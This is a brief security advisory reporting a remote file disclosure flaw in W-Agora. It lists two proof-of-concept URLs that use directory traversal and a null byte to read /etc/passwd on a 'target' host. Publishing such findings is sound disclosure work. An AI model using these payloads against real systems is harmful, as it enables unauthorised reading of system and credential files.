W-Agora Remote File Disclosure Vulnerability

W-Agora Remote File Disclosure Vulnerability

The following proof of concepts were provided:

http://target/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00
http://target/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1